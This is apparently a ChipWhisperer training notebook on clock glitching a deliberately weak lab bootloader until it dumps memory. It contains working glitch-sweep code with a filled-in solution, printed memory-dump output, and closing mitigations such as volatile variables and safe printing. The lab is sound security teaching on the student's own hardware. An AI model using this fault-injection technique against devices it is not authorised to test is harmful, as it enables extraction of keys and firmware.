# Part 1, Topic 3: Clock Glitching to Dump Memory (MAIN)

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *In the previous lab, we learned how clock glitching can be used to get a microcontroller to skip a password check. This time, we'll look at a more practical example: getting an example bootloader to dump a large chunk of memory.*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching
* Understanding how compiler optimizations can cause devices to behave in strange ways

## The Situation

Now that we've got our feet wet with glitching, we're going to try something a bit more realistic: an "encrypted" bootloader (it's actually just rot-13, but we'll pretend it's unbreakable encryption), where we make as few assumptions as possible. Our goal will be to get that bootloader to decrypt the data and send it back to us. Here's what we know about the bootloader:

1. The `'p'` command is used to write encrypted firmware to the device. It takes in an encrypted ASCII-encoded string, terminated with a newline. Our first chunk of firmware is `"516261276720736265747267206762206f686c207a76797821"`.
1. It does *something* to it (presumably unencrypts it, authenticates it, etc. and writes it to memory)
1. It sends back an error code of `"r000000\n"`

Of immediate interest is that error code. That's the only time the bootloader communicates back with us, so attacking there is a good place to start. One thing that we'll assume is that we've got a trigger right before the error code is sent back to us. This is just a simple `trigger_high()` call, but we could also trigger on an IO line (better with the CW1200 Pro) or with a SAD trigger on a power trace (CW1200 Pro only). We've got a place to start, but let's see if we can learn more about the bootloader first.

We recommend using SimpleSerial V2 for this as, though the firmware doesn't use the simpleserial protocol, the faster baud rate will help speed up glitching.

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'
SS_VER='SS_VER_2_1'

CRYPTO_TARGET = 'TINYAES128C'
allowable_exceptions = None
VERSION = 'HARDWARE'


In [2]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../firmware/mcu/bootloader-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE -j SS_VER=$2

SS_VER set to SS_VER_2_1


SS_VER set to SS_VER_2_1


arm-none-eabi-gcc (15:9-2019-q4-0ubuntu1) 9.2.1 20191025 (release) [ARM/arm-9-branch revision 277599

]
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copyin

g conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOS

...

me.


+ Specify buildtarget == allquick == to avoid full rebuild
+----------------------------------------

----------------
+--------------------------------------------------------


+ Built for platform CW-Lite Arm \(STM32F3\) with:
+ CRYPTO_TARGET = NONE
+ CRYPTO_OPTIONS = AES128C

+--------------------------------------------------------


In [3]:

#!/usr/bin/env python
# coding: utf-8

# In[ ]:


import chipwhisperer as cw

try:
    if not scope.connectStatus:
        scope.con()
except NameError:
    scope = cw.scope(hw_location=(5, 3))

try:
    if SS_VER == "SS_VER_2_1":
        target_type = cw.targets.SimpleSerial2
    elif SS_VER == "SS_VER_2_0":
        raise OSError("SS_VER_2_0 is deprecated. Use SS_VER_2_1")
    else:
        target_type = cw.targets.SimpleSerial
except:
    SS_VER="SS_VER_1_1"
    target_type = cw.targets.SimpleSerial

try:
    target = cw.target(scope, target_type)
except:
    print("INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.")
    print("INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.")
    scope = cw.scope(hw_location=(5, 3))
    target = cw.target(scope, target_type)


print("INFO: Found ChipWhisperer😍")


# In[ ]:


if "STM" in PLATFORM or PLATFORM == "CWLITEARM" or PLATFORM == "CWNANO":
    prog = cw.programmers.STM32FProgrammer
elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
    prog = cw.programmers.XMEGAProgrammer
elif "neorv32" in PLATFORM.lower():
    prog = cw.programmers.NEORV32Programmer
elif PLATFORM == "CW308_SAM4S" or PLATFORM == "CWHUSKY":
    prog = cw.programmers.SAM4SProgrammer
else:
    prog = None


# In[ ]:


import time
time.sleep(0.05)
scope.default_setup()

def reset_target(scope):
    if PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        scope.io.pdic = 'low'
        time.sleep(0.1)
        scope.io.pdic = 'high_z' #XMEGA doesn't like pdic driven high
        time.sleep(0.1) #xmega needs more startup time
    elif "neorv32" in PLATFORM.lower():
        raise IOError("Default iCE40 neorv32 build does not have external reset - reprogram device to reset")
    elif PLATFORM == "CW308_SAM4S" or PLATFORM == "CWHUSKY":
        scope.io.nrst = 'low'
        time.sleep(0.25)
        scope.io.nrst = 'high_z'
        time.sleep(0.25)
    else:  
        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.io.nrst = 'high_z'
        time.sleep(0.05)




INFO: Found ChipWhisperer😍


scope.gain.mode                          changed from low                       to high                     
scope.gain.gain                          changed from 0                         to 30                       
scope.gain.db                            changed from 5.5                       to 24.8359375               
scope.adc.basic_mode                     changed from low                       to rising_edge              
scope.adc.samples                        changed from 24400                     to 5000                     
scope.adc.trig_count                     changed from 10894024                  to 21956239                 
scope.clock.adc_src                      changed from clkgen_x1                 to clkgen_x4                
scope.clock.adc_freq                     changed from 18471508                  to 30389980                 
scope.clock.adc_rate                     changed from 18471508.0                to 30389980.0               
scope.clock.clkgen_

In [4]:
fw_path = "../../../firmware/mcu/bootloader-glitch/bootloader-{}.hex".format(PLATFORM)

In [5]:
cw.program_target(scope, prog, fw_path)

Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to program 4723 bytes at 0x8000000
STM32F Programming flash...


STM32F Reading flash...


Verified flash OK, 4723 bytes


The first thing we'll do is some simple power analysis to see what the device is doing when it sends data back to us. Serial communication is pretty slow, so set the ChipWhisperer to capture around 24k samples with a "x1" ADC clock.

In [6]:
def reboot_flush():            
    reset_target(scope)
    #Flush garbage too
    target.flush()
scope.clock.adc_src = "clkgen_x1"
reboot_flush()
scope.adc.samples = 24000

Next, capture a power trace. The string `"p516261276720736265747267206762206f686c207a76797821\n"` will send the bootloader the first chunk of code and plot it. If you don't see the full serial message, you can increase `scope.adc.decimate`, which will throw out every nth ADC sample.

In [7]:
scope.adc.timeout = 3
scope.arm()
target.write("p516261276720736265747267206762206f686c207a76797821\n")
ret = scope.capture()
if ret:
    print("Timeout")
trace = scope.get_last_trace()


cw.plot(trace)

:Curve   [x]   (y)

It doesn't look like anything too crazy is going on here - it's probably just printing some characters in a loop. Some ideas:

* If we glitch at the beginning of the loop, we might be able to corrupt the loop length variable and get it to print some extra memory
* We might be able to corrupt the loop variable and get it to read past where it's supposed to

For SimpleSerial V2, this should be short enough that you can quickly loop through the entirety of the code. If your target isn't using SimpleSerial V2, you should instead select a range a bit (~1000 cycles) before the end of the loop. If this doesn't succeed, you can try going after the cycles at the beginning of the loop.

**HINT: The last part of the loop should be near the beginning of the last power spike.**

**HINT: If you're really stuck on where the serial print ends, you can find the time between the `trigger_high()` and `trigger_low()` call with `scope.adc.trig_count`.**

In [8]:
trig_count = scope.adc.trig_count
print(trig_count)

4236


In [9]:
glitch_spots = [i for i in range(1)]
# ###################
# Add your code here
# ###################
#raise NotImplementedError("Add your code here, and delete this.")

# ###################
# START SOLUTION
# ###################
glitch_spots = list(range(trig_count - 2000, trig_count, 1))
if SS_VER == "SS_VER_2_1":
    glitch_spots = list(range(0, trig_count, 1))
elif PLATFORM == "CW308_SAM4S":
    glitch_spots = list(range(trig_count - 2300, trig_count-1800, 1))
elif PLATFORM == "CWLITEXMEGA":
    glitch_spots = list(range(9500, 9650, 1))
# ###################
# END SOLUTION
# ###################

In [10]:
print(glitch_spots)

[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221,

### Evaluating Success

Detecting whether our glitch was successful or not isn't quite as trivial as in the previous lab - we don't have a nice error return that the device calculates and sends back to us. One idea is that we can look for part of the string that we sent to the device: there isn't much time between us sending it and the error code being returned. With any luck the compiler will have placed both values close in memory.

Now the rest is up to you! Use what you learned in the previous lab to setup glitch settings and a glitch loop. Here's a few hints to make things easier:

1. Try to use a fairly small width and offset range since we'll need to scan ext_offset as well here. A total range of ~2-3 for each with 0.4 steps is a good range to aim for. These numbers are for CW-Lite/Pro; for CW-Husky, convert as per Fault 1_1.
1. Try looking for a part of the string we sent to the device to check for success.
1. You may want to forgo graphing or plot only successes/crashes if it makes things substantially slower - we're scanning a large range of glitch settings so we'll need all the speed we can get.

Set your glitch up here:

In [11]:
scope.adc.timeout = 0.1

scope.cglitch_setup()

def my_print(text):
    for ch in text:
        if (ord(ch) > 31 and ord(ch) < 127) or ch == "\n": 
            print(ch, end='')
        else:
            print("0x{:02X}".format(ord(ch)), end='')
        print("", end='')

scope.adc.samples                        changed from 24000                     to 5000                     
scope.clock.adc_src                      changed from clkgen_x1                 to clkgen_x4                
scope.clock.adc_freq                     changed from 8066871                   to 29538459                 
scope.clock.adc_rate                     changed from 8066871.0                 to 29538459.0               


Again, we can use the glitch controller to make loop setup easier:

In [12]:
gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset", "tries"])
gc.display_stats()

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=0.0, continuous_update=False, description='width setting:', disabled=True, max=10.0, readout…

FloatSlider(value=0.0, continuous_update=False, description='offset setting:', disabled=True, max=10.0, readou…

FloatSlider(value=0.0, continuous_update=False, description='ext_offset setting:', disabled=True, max=10.0, re…

FloatSlider(value=0.0, continuous_update=False, description='tries setting:', disabled=True, max=10.0, readout…

In [13]:
x_bound = (-48, 48)
y_bound = (glitch_spots[0], glitch_spots[-1])
if scope._is_husky:
    x_bound = gc.set_range("width", 3900, 4500)
gc.glitch_plot(plotdots={"success":"+g", "reset":"xr", "normal":None}, x_bound=x_bound, y_bound=y_bound,
               x_index="width", y_index="ext_offset")

:DynamicMap   []
   :Overlay
      .Points.I  :Points   [width,ext_offset]
      .Points.II :Points   [width,ext_offset]

Finally, create a glitch loop. Don't forget to check all the different `glitch_spots` as well!

In [14]:
scope.glitch.repeat = 1    
if scope._is_husky:
    gc.set_range("width", 3900, 4500)
    gc.set_range("offset", 2200, 2500)
    gc.set_range("ext_offset", glitch_spots[0], glitch_spots[-1])
    gc.set_global_step([100])
    gc.set_step("ext_offset", glitch_spots[1] - glitch_spots[0])
    gc.set_step("width", 100)
else:
    gc.set_global_step(0.4)
    if PLATFORM == "CWLITEXMEGA":
        gc.set_range("width", 46, 49.8)
        gc.set_range("offset", -46, -49.8)
    elif PLATFORM == "CW308_STM32F4":
        gc.set_range("width", 0.4, 10)
        gc.set_range("offset", 40, 49.8)
    elif PLATFORM == "CWLITEARM":
        gc.set_range("width", 0.8, 3.6)
        gc.set_range("offset", -4, -2)

gc.set_range("ext_offset", glitch_spots[0], glitch_spots[-1])
gc.set_step("ext_offset", glitch_spots[1] - glitch_spots[0])
gc.set_range("tries", 1, 1)
gc.set_step("tries", 1)
gc.set_step("ext_offset", 1)

broken = False
for glitch_setting in gc.glitch_values():
    scope.glitch.offset = glitch_setting[1]
    scope.glitch.width = glitch_setting[0]
    scope.glitch.ext_offset = glitch_setting[2]
    if broken:
        break
    if scope.adc.state:
        #print("Timeout, trigger still high!")
        gc.add("reset")
        #Device is slow to boot?
        reboot_flush()
        
    target.flush()
    scope.arm()
    target.write("p516261276720736265747267206762206f686c207a76797821\n")
    ret = scope.capture()
    if ret:
        #print('Timeout - no trigger')
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()
    else:
        time.sleep(0.05)
        output = target.read(timeout=2)
        if "767" in output:
            print("Glitched!\n\tExt offset: {}\n\tOffset: {}\n\tWidth: {}".format(scope.glitch.ext_offset, scope.glitch.offset, scope.glitch.width))
            gc.add("success")
            broken = True 
            for __ in range(500):
                num_char = target.in_waiting()
                if num_char:
                    my_print(output)
                    output = target.read(timeout=50)
            time.sleep(1)
            break
        else:
            gc.add("normal")

(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b


(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a


(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b


(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 08


(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b


...

0x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x15

@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x00

0x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x

 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x

0x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x000xEA0x000x150x00c0x100x000x080xEA0x000x150x000x100x010x00 0x0080x01@0xEA0x000x150x

## Diagnosing the Fault

As you can see by the output, the bootloader has suffered a pretty catastrophic failure! Not only has it spilled the secret, it's also dumped a whole bunch more memory. For a real bootloader, there's probably some pretty juicy stuff in there like encryption keys or previously decrypted firmware. Let's start by taking a look at the C source code that sends the error code back:

```C
trigger_high();

int i;
for(i = 0; i < ascii_idx; i++)
{
    putch(ascii_buffer[i]);
}
trigger_low();
state = IDLE;
```

Nothing really looks too unusual here. Before we take a look at the assembly and figure out what went wrong, let's try to make some guesses:

* Maybe the glitch corrupted the `ascii_idx` variable
    * The glitch happened near the end of the loop. It's unlikely the end of loop counter would be reloaded during the loop
* Maybe we skipped the last `i < ascii_idx` check
    * The glitch caused **a lot** of memory to be dumped. If we just skipped the last check it **should** only print an extra character
* i is a signed integer: maybe we corrupted it into being a really large negative number.

That last one seems to be our best theory, so let's go with that.

## The Answer

Let's check the assembly for our booloader. No need to decompile the binary or recompile to assembly, since there's also a listing file created as part of the build process (`*.lss`). This file also contains C, so it makes it easy to search (try something like the `trigger_high()` call). You might notice that instead of doing a `less than or equal` or `less than` comparison like was in our C code, the compiler has instead inserted a `not equal` comparison instead! This means our original guess may not have been correct, as our assumption about what would happen if the last `i < ascii_idx` was skipped doesn't hold. In fact, it's a lot more likely that the last check was skipped (or i was set to some large value) than flipping a particular bit.

This is actually a pretty unexpected change for the compiler to make, espcially since `less than`, `greater than`, and `not equal` are nearly identical instructions in terms of implementation and have both the same instruction size and speed. This showcases an important fact: the C code that you write is not directly translated to assembly. It needs to go through the compiler first, which may drastically change the intended logic of the program.

Now that we know what happened, let's look at some ways to fix it.

### 1. Volatile variables

C includes a keyword for variables called `volatile`, which indicates that the variable may change between accesses and therefore should not have optimizations applied to it. A typical use case for `volatile` is for peripheral registers on embedded devices. It would be really bad, for example, if you were trying to wait for an IO pin to go high in your code, but the compiler decided it would be faster to only check it only once and assume it doesn't change!

Try replacing `int i = 0;` before the print look with `volatile int i = 0;`, recompile, and check the listing file. Is there any other unexpected changes? What about if you consider the use case above (i.e. if `i` was a register instead of a loop variable)? Is there any way the attack might still work? If so, how might you mitigate this?

### 2. Unrolling the loop

Another potential way of solving this issue would be to manually unroll the loop. The message being printed by the bootloader is a constant length of 7 characters, so we could instead write:

```C
int i;
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
```

In fact, this is something the compiler might do on its own to optimize the code, since unrolling a loop like this is faster than the loop version. It's not a good idea to blindly rely on this, however, since the compiler could choose not to make this optimization as well and might change it between builds.

### 3. Checking for invalid characters

Another thing to consider is that the message from the bootloader only has a limited range of characters that it prints. We could instead construct a "safe print" function that only prints newlines, `'r'` and ASCII digits (i.e. `'0'` to `'9'`):

```C
int safe_print(char c)
{
    if ((c == '\n') ||
       ((c >= '0') && (c <= '9')) ||
       (c == 'r')) {
        putch(c);
        return 0;
    }
    return -1; //uh oh!
}
```

It we went this route, it would be a good idea to make the error return a separate buffer with a bunch of null characters at the end.

### 4. More generic methods

More generic ways of defending against glitch attacks (memory guards, for example) are also discussed in the training slides.

In [15]:
scope.dis()
target.dis()

In [16]:
assert broken is True